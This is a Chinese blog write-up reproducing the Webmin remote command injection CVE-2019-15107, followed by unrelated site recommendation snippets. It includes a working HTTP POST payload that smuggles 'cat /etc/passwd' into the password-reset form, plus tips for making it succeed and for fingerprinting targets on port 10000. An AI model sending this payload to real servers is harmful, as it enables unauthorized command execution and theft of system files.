yuan_boss
yuan_boss

Webmin远程命令执行漏洞复现

文章目录

  • Webmin_1.910_rce(CVE-2019-15107)
        • 漏洞编号
        • 漏洞描述
        • 影响版本
        • 漏洞评级
        • 利用方法(利用案例)
        • 漏洞挖掘
        • 加固建议
        • 参考信息
        • 漏洞分类

Webmin_1.910_rce(CVE-2019-15107)

漏洞编号

CVE-2019-15107

漏洞描述

Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。

详细的来说,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码,该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码

影响版本

Webmin<=1.920

漏洞评级

严重

利用方法(利用案例)

参考链接:https://vulhub.org/#/environments/webmin/CVE-2019-15107/

payload

payload中的IP改为目标网站的IP,注意user=rootxx这部分,如果写的是user=root,肯定不能成功注入,必须是目标网站的服务器中不存在的用户,否则就会命令执行失败。

发送如下数据包即可执行命令:cat /etc/passwd

POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

user=rootxx&pam=&expired=2&old=test|cat+/etc/passwd&new1=test2&new2=test2

Webmin远程命令执行漏洞复现_第1张图片

漏洞挖掘

指纹特征

查找webmin指纹

Webmin远程命令执行漏洞复现_第2张图片

默认端口

10000是这个系统的默认端口

在目标网站访问这个url:/password_change.cgi

若出现以下界面,说明很可能存在漏洞:

Webmin远程命令执行漏洞复现_第3张图片

加固建议

升级到1.930版本

参考信息

https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html

https://www.exploit-db.com/exploits/47230

https://blog.firosolutions.com/exploits/webmin/

https://vulhub.org/#/environments/webmin/CVE-2019-15107/

https://blog.csdn.net/weixin_43486390/article/details/111591676

漏洞分类

远程命令执行漏洞(RCE)

你可能感兴趣的:(漏洞库,漏洞实战,漏洞复现,webmin,远程命令执行,web渗透)

  • Vibe Coding开发微信小程序实战案例 程序员陆通 微信小程序notepad++小程序AI编程
    在AI编程时代,人人都能编程。我以"个人记账助手"小程序为例,详细演示整个开发过程。项目概述项目名称:个人记账助手功能描述:用户可以记录日常收支,查看统计图表,管理账单分类技术栈:微信小程序原生开发+云开发开发方式:VibeCoding+AI辅助第一阶段:需求分析与架构设计与AI对话进行需求梳理开发者描述:我想开发一个微信小程序,功能是个人记账。用户可以:1.添加收入和支出记录2.选择消费分类(餐
  • 深入剖析AI大模型:关于模型训练 chilavert318 熬之滴水穿石人工智能
    今天说的是模型训练,在AI模型里,它是点亮智慧星辰的关键引擎。今天将围绕开源预训练模型的使用、数据与模型的集成、模型的部署管理,以及大规模模型的可扩展性与效率提升展开,带大家开启一场深入浅出的模型训练实战之旅。一、使用开源预训练模型1、如何利用开源模型(如BERT、GPT)进行微调开源预训练模型就像是已经搭建好框架的摩天大楼,BERT、GPT等模型便是其中声名赫赫的标志性建筑。它们经过海量数据的“
  • MapReduce01:基本原理和wordCount代码实现 冬至喵喵 大数据mapreduce
    本篇文章中,笔者记录了自己对于MapReduce的肤浅理解,参考资料主要包括《大数据Hadoop3.X分布式处理实战》和网络视频课程。下文介绍了MapReduce的基本概念、运行逻辑以及在wordCount代码示例。一、MapReduce概述1.概述google为解决其搜索引擎中的大规模网页数据的并行化处理问题,设计了MapReduce,在发明MapReduce之后首先用其重新改写了搜索引擎中we
  • 用鸿蒙打造真正的跨设备数据库:从零实现分布式存储 网罗开发 HarmonyOS实战源码实战harmonyos数据库分布式
    网罗开发(小红书、快手、视频号同名)  大家好,我是展菲,目前在上市企业从事人工智能项目研发管理工作,平时热衷于分享各种编程领域的软硬技能知识以及前沿技术,包括iOS、前端、HarmonyOS、Java、Python等方向。在移动端开发、鸿蒙开发、物联网、嵌入式、云原生、开源等领域有深厚造诣。图书作者:《ESP32-C3物联网工程开发实战》图书作者:《SwiftUI入门,进阶与实战》超级个体:CO
  • 从零掌握二叉树序列化:Swift实战详解,让你的树结构飞起来! 网罗开发 Swiftswift开发语言ios
    文章目录摘要描述题解答案序列化思路反序列化思路题解代码分析示例测试及结果时间复杂度空间复杂度总结摘要今天咱们来聊聊二叉树的一个经典问题:序列化和反序列化。简单来说,就是把一棵二叉树转换成字符串形式(序列化),然后再把这个字符串还原成原来的二叉树(反序列化)。这个问题在实际开发中特别有用,比如你想把一棵树结构保存到文件里,或者通过网络传输给其他服务,都需要用到这种技术。描述想象一下,你正在开发一个社
  • 【PHP开发900个实用技巧】405.API限流技术:Redis实现令牌桶算法的高级用法 精通代码大仙 PHP开发900个实用技巧phpredis算法程序员创富
    百万并发下的生存法则:用Redis+Lua构建坚不可摧的API流量防线!本文将揭示令牌桶算法在PHP高并发场景的核心实现技巧,包括Lua原子操作、动态策略配置与深度避坑指南,让你的API从此从容应对流量风暴。API限流技术:Redis实现令牌桶高级用法01.令牌桶原理解析02.Redis为何是最强拍档03.PHP实战四步曲3.1Lua脚本原子操作3.2对象封装技巧3.3动态参数配置3.4平滑突发流
  • Python Day58 别勉. python机器学习python信息可视化数据分析
    Task:1.时序建模的流程2.时序任务经典单变量数据集3.ARIMA(p,d,q)模型实战4.SARIMA摘要图的理解5.处理不平稳的2种差分a.n阶差分—处理趋势b.季节性差分—处理季节性建立一个ARIMA模型,通常遵循以下步骤:数据可视化:观察原始时间序列图,判断是否存在趋势或季节性。平稳性检验:对原始序列进行ADF检验。如果p值>0.05,说明序列非平稳,需要进行差分。确定差分次数d:进行
  • Python Day44 别勉. python机器学习python开发语言
    Task:1.预训练的概念2.常见的分类预训练模型3.图像预训练模型的发展史4.预训练的策略5.预训练代码实战:resnet181.预训练的概念预训练(Pre-training)是指在大规模数据集上,先训练模型以学习通用的特征表示,然后将其用于特定任务的微调。这种方法可以显著提高模型在目标任务上的性能,减少训练时间和所需数据量。核心思想:在大规模、通用的数据(如ImageNet)上训练模型,学习丰
  • Swift 实现二叉树垂直遍历:LeetCode 314 完整解析与实战示例 网罗开发 Swiftswiftleetcode开发语言
    文章目录摘要描述题解答案题解代码分析代码关键点解释:示例测试及结果解释一下输出:时间复杂度空间复杂度总结摘要在日常项目中,处理「树状结构」并不是稀罕事,比如做组织架构图、文件夹视图或者评论嵌套列表,我们经常会遇到对树的各种“奇怪”遍历方式。今天这题LeetCode314——BinaryTreeVerticalOrderTraversal(二叉树的垂直遍历),就考验了我们如何按垂直方向组织二叉树节点
  • 零基础起步:基于GpuGeek的文本生成模型实战 昊昊该干饭了 人工智能nlp深度学习gpu算力gru
    在自然语言处理(NLP)领域,文本生成任务广泛应用于问答系统、智能摘要、内容创作等方向。本文将带领读者使用GpuGeek平台,从注册、上传数据到实例部署与训练,完整构建一个基于GPT2模型的文本生成系统,实战掌握AI模型的云端开发流程。目录一、GpuGeek平台使用流程详解1.注册与登录2.数据上传3.创建训练实例4.启动与使用实例5.关闭实例(手动&自动)二、文本生成实战任务:微调GPT-21.
  • [特殊字符] 分享裂变新姿势:用 UniApp + Vue3 玩转小程序页面分享跳转! nbsaas-boot notepad++uniapp小程序
    在如今流量成本日益攀升的移动互联网时代,"用户分享拉新"成为了增长的重要策略。而微信小程序作为天然具备社交传播力的平台,提供了较完善的分享机制支持。本文将从实战角度出发,手把手教你如何使用uni-app+Vue3构建一个支持「页面级分享跳转」的微信小程序。无论你是做营销活动、邀请有奖,还是积分商城,掌握这套技能,都将助你轻松实现「分享裂变+定向跳转+追踪来源」。一、你将实现什么?在任意页面中添加“
  • 基于STM32的智能农业灌溉系统设计与实现 STM32发烧友 stm32嵌入式硬件单片机
    目录引言环境准备2.1硬件准备2.2软件准备系统架构与基础3.1控制系统架构3.2功能描述代码实现:实现智能农业灌溉系统4.1环境监测模块4.2灌溉控制模块4.3通信与远程监控实现4.4用户界面与数据可视化应用场景:农业灌溉与节水控制问题解决方案与优化收尾与总结1.引言随着农业现代化进程的推进,传统的灌溉方式逐渐无法满足节水、高效的需求。智能农业灌溉系统通过集成传感器、嵌入式控制技术和无线通信模块
  • 基于STM32开发的智能花园灌溉系统 STM32发烧友 stm32嵌入式硬件单片机
    目录引言环境准备工作硬件准备软件安装与配置系统设计系统架构硬件连接代码实现系统初始化土壤湿度监测与处理灌溉控制与状态指示Wi-Fi通信与远程监控应用场景家庭花园智能灌溉农业田地的智能灌溉管理常见问题及解决方案常见问题解决方案结论1.引言随着智能家居技术的发展,智能花园灌溉系统逐渐成为家庭园艺和农业生产中提高水资源利用效率的重要工具。该系统通过集成土壤湿度传感器、雨滴传感器、Wi-Fi模块等硬件,实
  • 基于SpringBoot的餐厅点餐系统的设计与实现 毕设小助手 springboot后端java
    收藏关注不迷路//项目拿到就可以直接使用,但是用于作业或者毕设需要自己懂代码之后进行自行修改//支持毕设定制//远程支持//可联系博主----------同类型文章可以联系博主----------争取每天三篇,有需要的用户可以关注查看哦~今日第三篇-发布的文章皆有源码,私信联系可获取源码~本项目设计与实施了一个基于SpringBoot的餐厅点餐系统,探讨了该系统在提高点餐效率、优化订单管理和提升顾
  • 可编程电子安全相关系统_编程中的安全生态系统概述 danpu0978 编程语言pythonjava人工智能linux
    可编程电子安全相关系统就像近年来的情况一样,安全漏洞已越来越被接受。仅以最近的Equifax违规为例。无论我们在哪里看,似乎总有人会遭受某种形式的恶意攻击或其他形式的攻击。尽管我们最近想到了最近的漏洞,但我还是想花一点时间来概述有关软件开发的安全生态系统。我将从建设性和积极的角度介绍您可以做的一些关键事情,以提高您的应用程序的安全性,以应对安全漏洞。为此,我将研究四个关键领域。他们将主要讨论具体的
  • 教育技术资源大全(05-11-28) Shidi123 技术文摘教育网络出版设计模式工作交通
    教育技术资源大全1、国内教育技术综合网站2、国外教育技术资源索引网站:3、远程教育网站;4、教学设计网站;5、教育技术论坛网站;6、国内67所远程教育试点院校网(点击校名可看该网院的介绍,点击网址可进入网院。)7、教育技术协会网;国内教育技术期刊:国外教育技术期刊:全美远程教育杂志列表http://ccc.commnet.edu/HP/pages/darling/journals.htm教育技术相
  • 【pycharm专业版】【如何远程配置Python解释器】【SSH】 资源存储库 pythonpycharm
    Wejustlookedatconfiguringalocalinterpreter.Butwedon’talwayshavea“local”environment.Sometimes–andincreasinglyoften–ourenvironmentisoverthere.我们刚刚看了配置本地解释器。但我们并不总是有一个“本地”的环境。有时候–而且越来越多的时候–我们的环境就在那里。Let’
  • 给pycharm配置conda环境无响应...如何解决? bug菌¹ 全栈Bug调优(实战版)pycharmcondajavapython
    本文收录于《全栈Bug调优(实战版)》专栏,主要记录项目实战过程中所遇到的Bug或因后果及提供真实有效的解决方案,希望能够助你一臂之力,帮你早日登顶实现财富自由;同时,欢迎大家关注&&收藏&&订阅!持续更新中,up!up!up!!备注:部分问题/疑难杂症搜集于互联网。全文目录:问题描述解决方案(请知悉:如下方案不保证一定适配你的问题)问题分析解决方案总结文末福利,等你来拿!✨️WhoamI?问题描
  • 如何利用ssh使得pycharm连接服务器的docker容器内部环境 SoulMatter docker容器运维pycharmssh
    如题,想要配置服务器的python编译器环境,来查看容器内部环境安装的包的情况。首先,需要确定容器的状态,使用dockerps查看,只有ports那一栏有内容才证明容器暴露了端口出来。如果没有暴露,就需要将容器打包成镜像,然后将镜像再启动一个容器才可以。步骤如下:如何打包镜像:(里面包括了将镜像从A服务器远程传输到B服务器后使用的方法,如果是在本服务器自己使用,那么忽略远程传输的步骤)#创建一个基
  • LangChain4j在Java企业应用中的实战指南-2 在未来等你 大模型应用开发AI技术编程JavaSpring
    LangChain4j在Java企业应用中的实战指南文章标签langchain4j,JavaAI,RAG系统,智能应用开发,LangChain4j实战,企业级AI应用,Java微服务,检索增强生成文章简述随着大语言模型(LLM)的广泛应用,企业对智能应用的需求日益增长。LangChain4j作为一款专为Java生态打造的LLM集成框架,正在成为构建RAG(检索增强生成)系统和智能应用的重要工具。本
  • JavaScript数组方法 whhhhhhhhhw javascript开发语言ecmascript前端html
    前言:JavaScript这门强大而灵活的编程语言中,数组(Array)无疑是最基础且使用最频繁的数据结构之一。它允许我们以有序的方式存储多个值,并提供了丰富的内置方法来操作这些值,包括但不限于添加、删除、搜索、遍历等。掌握JavaScript数组的方法,不仅能够提高我们的编程效率,还能让我们在处理复杂数据结构时更加得心应手。本文将全面解析JavaScript数组的各种常用方法,并通过实战示例展示
  • Netty和gRPC区别 不曾高瞻远瞩 rpc
    1.框架类型Netty:Netty是一个异步事件驱动的网络应用框架,用于开发高性能的网络服务器和客户端应用程序。它是一个低级别的网络框架,主要用于处理TCP、UDP、HTTP等协议。Netty提供了灵活的API来构建自定义的网络协议和传输层逻辑。gRPC:gRPC是一个基于HTTP/2和ProtocolBuffers的高性能RPC(远程过程调用)框架。它是一个高级别的通信框架,专注于提供简单易用且
  • 【go从入门到精通】rpc和grpc的使用 前网易架构师-高司机 golang从入门到精通golangrpc开发语言golang从入门到精通go从入门到精通grpc
    RPC简介远程过程调用(RemoteProcedureCall,RPC)是一个计算机通信协议该协议允许运行于一台计算机的程序调用另一台计算机的子程序,而程序员无需额外地为这个交互作用编程如果涉及的软件采用面向对象编程,那么远程过程调用亦可称作远程调用或远程方法调用RPC应用场景RPC的应用场景通常是在复杂的系统中,当单一应用无法承受高流量和复杂业务时,系统会被拆分成多个服务,这些服务可能需要部署在
  • C语言控制结构深度解析:从底层原理到高效实战技巧 Bryan Ding c语言开发语言
    一、程序逻辑的核心密码程序设计的本质是对现实问题的抽象和逻辑表达。C语言作为结构化编程语言的典范,其控制结构构成了程序逻辑的骨架。三大基本结构构成所有程序的逻辑基础:顺序结构:代码的自然执行顺序选择结构:if/else语句实现分支判断循环结构:for/while实现重复操作二、选择结构的底层实现1.if语句的机器级实现if (condition){   //代码块}编译后的汇编代码示例:  cmp
  • 责任链模式 Go 语言实战
    责任链模式(ChainofResponsibility)责任链模式是一种行为设计模式,它允许将请求沿着处理者链进行传递,直到有一个处理者能够处理它。这个模式的主要目的是解耦请求的发送者和接收者,使得多个对象都有机会处理这个请求,而不需要明确指定哪个对象处理请求。责任链模式的结构处理者接口(Handler):定义一个处理请求的接口,通常包括一个处理请求的方法和一个设置下一个处理者的方法。具体处理者(
  • CNC编程实战解析:钻孔与攻螺纹技巧 Salton Z CNC编程钻孔循环攻螺纹循环G81G82
    背景简介在现代制造业中,CNC(计算机数控)机床扮演着至关重要的角色。通过精确的编程,CNC机床能够在材料上完成复杂的加工任务。本章将深入探讨CNC编程中的两个核心环节:钻孔与攻螺纹,通过具体程序实例,揭示如何编写高效准确的CNC程序。G81与G84循环程序解析首先,我们来看G81钻孔循环和G84攻螺纹循环的程序示例。这些循环是CNC编程中常用的指令,能够简化钻孔和攻螺纹的编程过程。G81钻孔循环
  • Docker容器升级MySQL Java王小怪 dockermysql容器
    目录服务升级密码重置1、找到挂载配置文件2、重启服务3、容器交互4、修改密码5、还原配置文件前言:由于项目需要,我们使用docker-compose启动的MySQL服务,原先版本为5.7.3,在服务扫描过程中,发现此版本的MySQL存在漏洞,遂决定对MySQL版本进行升级。服务升级由于库中数据还存在不少,我们并没有把原先MySQL的容器进行删除重新搞个新的,只是升级版本可以做到无痛割接。由于我的M
  • 掌握Android Jetpack,优化移动开发体验 移动开发前沿 移动端开发宝典androidjetpackandroidai
    掌握AndroidJetpack,优化移动开发体验关键词:AndroidJetpack、组件化开发、ViewModel、LiveData、Room、Navigation、Compose摘要:本文深入探讨AndroidJetpack组件库的核心架构和使用方法,通过系统化的讲解和实战演示,帮助开发者理解如何利用Jetpack系列组件提升开发效率、构建健壮的Android应用。文章将从基础概念入手,逐步
  • 【数据标注师】事件标注2 试着 数据标注师数据标注师事件标注
    目录一、**深入理解事件标注的核心架构**1.**事件五要素(标注核心对象)**2.**三大项目特性**二、**四阶段系统学习法**▶**阶段1:掌握标注指南(20%理论+80%案例)**▶**阶段2:触发词精准识别训练**▶**阶段3:要素抽取实战技巧**▶**阶段4:复杂场景突破三、**高效标注工具使用指南**1.**快捷键流操作(以主流工具为例)**2.**颜色编码法**四、**错误防御体系
  • PWM技术全解析:从零到企业级开发实战 Android洋芋 PWM技术原理电机控制SPWM/SVPWM优化高效调制应用电源管理
    简介PWM(脉冲宽度调制)技术是现代电子控制系统的核心技术之一,通过调节数字信号的占空比来实现对模拟信号的控制。PWM技术以其高精度、高效率和灵活性优势,广泛应用于电机控制、电源管理、LED调光和通信协议模拟等领域。无论您是电子工程初学者还是资深开发者,掌握PWM技术都将为您的项目带来显著优势。本文将从PWM基础原理出发,深入讲解其核心公式,提供企业级开发实战案例,并附有详细代码及解释,助您从零到
  • 312个免费高速HTTP代理IP(能隐藏自己真实IP地址) yangshangchuan 高速免费superwordHTTP代理
        124.88.67.20:843 190.36.223.93:8080 117.147.221.38:8123 122.228.92.103:3128 183.247.211.159:8123 124.88.67.35:81 112.18.51.167:8123 218.28.96.39:3128 49.94.160.198:3128 183.20
  • pull解析和json编码 百合不是茶 androidpull解析json
    n.json文件: [{name:java,lan:c++,age:17},{name:android,lan:java,age:8}]   pull.xml文件 <?xml version="1.0" encoding="utf-8"?> <stu>     <name>java
  • [能源与矿产]石油与地球生态系统 comsci 能源
          按照苏联的科学界的说法,石油并非是远古的生物残骸的演变产物,而是一种可以由某些特殊地质结构和物理条件生产出来的东西,也就是说,石油是可以自增长的....       那么我们做一个猜想: 石油好像是地球的体液,我们地球具有自动产生石油的某种机制,只要我们不过量开采石油,并保护好
  • 类与对象浅谈 沐刃青蛟 java基础
           类,字面理解,便是同一种事物的总称,比如人类,是对世界上所有人的一个总称。而对象,便是类的具体化,实例化,是一个具体事物,比如张飞这个人,就是人类的一个对象。但要注意的是:张飞这个人是对象,而不是张飞,张飞只是他这个人的名字,是他的属性而已。而一个类中包含了属性和方法这两兄弟,他们分别用来描述对象的行为和性质(感觉应该是
  • 新站开始被收录后,我们应该做什么? IT独行者 PHPseo
    新站开始被收录后,我们应该做什么?         百度终于开始收录自己的网站了,作为站长,你是不是觉得那一刻很有成就感呢,同时,你是不是又很茫然,不知道下一步该做什么了?至少我当初就是这样,在这里和大家一份分享一下新站收录后,我们要做哪些工作。       至于如何让百度快速收录自己的网站,可以参考我之前的帖子《新站让百
  • oracle 连接碰到的问题 文强chu oracle
    Unable to find a java Virtual Machine--安装64位版Oracle11gR2后无法启动SQLDeveloper的解决方案 作者:草根IT网 来源:未知 人气:813标签: 导读:安装64位版Oracle11gR2后发现启动SQLDeveloper时弹出配置java.exe的路径,找到Oracle自带java.exe后产生的路径“C:\app\用户名\prod
  • Swing中按ctrl键同时移动鼠标拖动组件(类中多借口共享同一数据) 小桔子 java继承swing接口监听
            都知道java中类只能单继承,但可以实现多个接口,但我发现实现多个接口之后,多个接口却不能共享同一个数据,应用开发中想实现:当用户按着ctrl键时,可以用鼠标点击拖动组件,比如说文本框。 编写一个监听实现KeyListener,NouseListener,MouseMotionListener三个接口,重写方法。定义一个全局变量boolea
  • linux常用的命令 aichenglong linux常用命令
    1 startx切换到图形化界面 2 man命令:查看帮助信息 man 需要查看的命令,man命令提供了大量的帮助信息,一般可以分成4个部分 name:对命令的简单说明 synopsis:命令的使用格式说明 description:命令的详细说明信息 options:命令的各项说明 3 date:显示时间 语法:date [OPTION]... [+FORMAT]
  • eclipse内存优化 AILIKES javaeclipsejvmjdk
    一 基本说明      在JVM中,总体上分2块内存区,默认空余堆内存小于 40%时,JVM就会增大堆直到-Xmx的最大限制;空余堆内存大于70%时,JVM会减少堆直到-Xms的最小限制。     1)堆内存(Heap memory):堆是运行时数据区域,所有类实例和数组的内存均从此处分配,是Java代码可及的内存,是留给开发人
  • 关键字的使用探讨 百合不是茶 关键字
    //关键字的使用探讨/*访问关键词private 只能在本类中访问public 只能在本工程中访问protected 只能在包中和子类中访问默认的 只能在包中访问*//*final   类 方法 变量 final 类 不能被继承 final 方法 不能被子类覆盖,但可以继承 final 变量 只能有一次赋值,赋值后不能改变 final 不能用来修饰构造方法*///this()
  • JS中定义对象的几种方式 bijian1013 js
        1. 基于已有对象扩充其对象和方法(只适合于临时的生成一个对象): <html> <head> <title>基于已有对象扩充其对象和方法(只适合于临时的生成一个对象)</title> </head> <script> var obj = new Object();
  • 表驱动法实例 bijian1013 java表驱动法TDD
    获得月的天数是典型的直接访问驱动表方式的实例,下面我们来展示一下: MonthDaysTest.java package com.study.test; import org.junit.Assert; import org.junit.Test; import com.study.MonthDays; public class MonthDaysTest { @T
  • LInux启停重启常用服务器的脚本 bit1129 linux
    启动,停止和重启常用服务器的Bash脚本,对于每个服务器,需要根据实际的安装路径做相应的修改   #! /bin/bash Servers=(Apache2, Nginx, Resin, Tomcat, Couchbase, SVN, ActiveMQ, Mongo); Ops=(Start, Stop, Restart); currentDir=$(pwd); echo
  • 【HBase六】REST操作HBase bit1129 hbase
    HBase提供了REST风格的服务方便查看HBase集群的信息,以及执行增删改查操作   1. 启动和停止HBase REST 服务 1.1 启动REST服务 前台启动(默认端口号8080) [hadoop@hadoop bin]$ ./hbase rest start   后台启动 hbase-daemon.sh start rest   启动时指定
  • 大话zabbix 3.0设计假设 ronin47
    What’s new in Zabbix 2.0? 去年开始使用Zabbix的时候,是1.8.X的版本,今年Zabbix已经跨入了2.0的时代。看了2.0的release notes,和performance相关的有下面几个:          :: Performance improvements::Trigger related da
  • http错误码大全 byalias http协议javaweb
    响应码由三位十进制数字组成,它们出现在由HTTP服务器发送的响应的第一行。 响应码分五种类型,由它们的第一位数字表示: 1)1xx:信息,请求收到,继续处理 2)2xx:成功,行为被成功地接受、理解和采纳 3)3xx:重定向,为了完成请求,必须进一步执行的动作 4)4xx:客户端错误,请求包含语法错误或者请求无法实现 5)5xx:服务器错误,服务器不能实现一种明显无效的请求
  • J2EE设计模式-Intercepting Filter bylijinnan java设计模式数据结构
    Intercepting Filter类似于职责链模式 有两种实现 其中一种是Filter之间没有联系,全部Filter都存放在FilterChain中,由FilterChain来有序或无序地把把所有Filter调用一遍。没有用到链表这种数据结构。示例如下: package com.ljn.filter.custom; import java.util.ArrayList;
  • 修改jboss端口 chicony jboss
    修改jboss端口   %JBOSS_HOME%\server\{服务实例名}\conf\bindingservice.beans\META-INF\bindings-jboss-beans.xml   中找到 <!-- The ports-default bindings are obtained by taking the base bindin
  • c++ 用类模版实现数组类 CrazyMizzz C++
    最近c++学到数组类,写了代码将他实现,基本具有vector类的功能 #include<iostream> #include<string> #include<cassert> using namespace std; template<class T> class Array { public: //构造函数
  • hadoop dfs.datanode.du.reserved 预留空间配置方法 daizj hadoop预留空间
    对于datanode配置预留空间的方法 为:在hdfs-site.xml添加如下配置  <property>     <name>dfs.datanode.du.reserved</name>     <value>10737418240</value>    
  • mysql远程访问的设置 dcj3sjt126com mysql防火墙
    第一步: 激活网络设置 你需要编辑mysql配置文件my.cnf. 通常状况,my.cnf放置于在以下目录: /etc/mysql/my.cnf (Debian linux) /etc/my.cnf (Red Hat Linux/Fedora Linux) /var/db/mysql/my.cnf (FreeBSD) 然后用vi编辑my.cnf,修改内容从以下行: [mysqld] 你所需要: 1
  • ios 使用特定的popToViewController返回到相应的Controller dcj3sjt126com controller
    1、取navigationCtroller中的Controllers NSArray * ctrlArray = self.navigationController.viewControllers; 2、取出后,执行, [self.navigationController popToViewController:[ctrlArray objectAtIndex:0] animated:YES
  • Linux正则表达式和通配符的区别 eksliang 正则表达式通配符和正则表达式的区别通配符
    转载请出自出处:http://eksliang.iteye.com/blog/1976579 首先得明白二者是截然不同的 通配符只能用在shell命令中,用来处理字符串的的匹配。 判断一个命令是否为bash shell(linux 默认的shell)的内置命令 type -t commad 返回结果含义 file  表示为外部命令 alias  表示该
  • Ubuntu Mysql Install and CONF gengzg Install
    http://www.navicat.com.cn/download/navicat-for-mysql Step1: 下载Navicat ,网址:http://www.navicat.com/en/download/download.html Step2:进入下载目录,解压压缩包:tar -zxvf navicat11_mysql_en.tar.gz
  • 批处理,删除文件bat huqiji windowsdos
    @echo off ::演示:删除指定路径下指定天数之前(以文件名中包含的日期字符串为准)的文件。 ::如果演示结果无误,把del前面的echo去掉,即可实现真正删除。 ::本例假设文件名中包含的日期字符串(比如:bak-2009-12-25.log) rem 指定待删除文件的存放路径 set SrcDir=C:/Test/BatHome rem 指定天数 set DaysAgo=1
  • 跨浏览器兼容的HTML5视频音频播放器 天梯梦 html5
    HTML5的video和audio标签是用来在网页中加入视频和音频的标签,在支持html5的浏览器中不需要预先加载Adobe Flash浏览器插件就能轻松快速的播放视频和音频文件。而html5media.js可以在不支持html5的浏览器上使video和audio标签生效。   How to enable <video> and <audio> tags in
  • Bundle自定义数据传递 hm4123660 androidSerializable自定义数据传递BundleParcelable
          我们都知道Bundle可能过put****()方法添加各种基本类型的数据,Intent也可以通过putExtras(Bundle)将数据添加进去,然后通过startActivity()跳到下一下Activity的时候就把数据也传到下一个Activity了。如传递一个字符串到下一个Activity   把数据放到Intent
  • C#:异步编程和线程的使用(.NET 4.5 ) powertoolsteam .net线程C#异步编程
    异步编程和线程处理是并发或并行编程非常重要的功能特征。为了实现异步编程,可使用线程也可以不用。将异步与线程同时讲,将有助于我们更好的理解它们的特征。 本文中涉及关键知识点 1. 异步编程 2. 线程的使用 3. 基于任务的异步模式 4. 并行编程 5. 总结 异步编程 什么是异步操作?异步操作是指某些操作能够独立运行,不依赖主流程或主其他处理流程。通常情况下,C#程序
  • spark 查看 job history 日志 Stark_Summer 日志sparkhistoryjob
    SPARK_HOME/conf 下: spark-defaults.conf 增加如下内容 spark.eventLog.enabled true spark.eventLog.dir hdfs://master:8020/var/log/spark spark.eventLog.compress true spark-env.sh 增加如下内容 export SP
  • SSH框架搭建 wangxiukai2015eye springHibernatestruts
    MyEclipse搭建SSH框架 Struts Spring Hibernate 1、new一个web project。 2、右键项目,为项目添加Struts支持。    选择Struts2 Core Libraries -<MyEclipes-Library>      点击Finish。src目录下多了struts
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他